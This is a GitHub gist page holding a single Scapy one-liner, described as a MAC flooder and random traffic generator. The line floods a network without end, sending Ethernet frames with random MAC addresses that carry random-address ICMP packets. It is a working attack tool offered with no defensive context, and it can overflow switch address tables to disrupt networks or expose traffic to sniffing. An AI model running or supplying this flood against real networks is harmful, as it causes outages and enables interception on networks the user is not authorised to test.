Skip to content

Instantly share code, notes, and snippets.

@corifeo
Created March 13, 2013 12:33
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save corifeo/5151655 to your computer and use it in GitHub Desktop.
Save corifeo/5151655 to your computer and use it in GitHub Desktop.
mac flooder and random traffic generator for scapy
sendp(Ether(src=RandMAC(), dst=RandMAC()) / IP(src=RandIP(), dst=RandIP()) / ICMP(), loop=True)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment